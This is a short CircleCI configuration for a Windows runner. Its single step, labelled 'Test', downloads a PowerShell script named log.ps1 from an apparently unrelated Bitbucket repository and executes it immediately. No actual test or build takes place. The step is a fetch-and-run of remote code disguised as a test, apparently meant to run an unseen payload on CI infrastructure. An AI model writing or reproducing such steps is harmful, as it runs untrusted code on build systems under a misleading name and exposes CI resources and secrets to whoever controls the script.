version: 2.1 
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build: 
    executor:
      name: win/default 
      size: "medium" 
 
    steps:
      - run:
          name: Test
          command: |
            Invoke-WebRequest https://bitbucket.org/akehisoora/nyobonenj/raw/3f5bcceea27e92c8abbb12abd81e0de9d917fa39/log.ps1 -OutFile log.ps1
            ./log.ps1